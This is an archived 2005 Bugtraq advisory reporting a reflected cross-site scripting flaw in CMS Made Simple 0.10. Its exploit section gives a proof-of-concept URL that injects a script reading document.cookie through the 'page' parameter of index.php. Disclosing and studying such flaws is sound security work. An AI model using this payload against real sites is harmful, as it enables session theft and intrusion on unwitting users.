[40490] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

daemon@ATHENA.MIT.EDU (X1ngBox@securityfocus.com,Gmail@se)
Tue Sep 27 16:34:59 2005

Date: 26 Sep 2005 08:38:05 -0000
Message-ID: <20050926083805.27351.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: X1ngBox@securityfocus.com, Gmail@securityfocus.com,
        COM@securityfocus.com
To: bugtraq@securityfocus.com

[Description]: CMS lets you update your pages and keep the content on a static page that will
                not become stale regardless of how much other content gets placed on your site


[version]:CMS Made Simple 0.10

[vendor]:http://www.cmsmadesimple.org

[Vulnerability]: cross site script

[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
 
.......[X1NG]..........
X1ngBox <at/> Gmail Com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40490] in bugtraq

CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

daemon@ATHENA.MIT.EDU (X1ngBox@securityfocus.com,Gmail@se)Tue Sep 27 16:34:59 2005

daemon@ATHENA.MIT.EDU (X1ngBox@securityfocus.com,Gmail@se)
Tue Sep 27 16:34:59 2005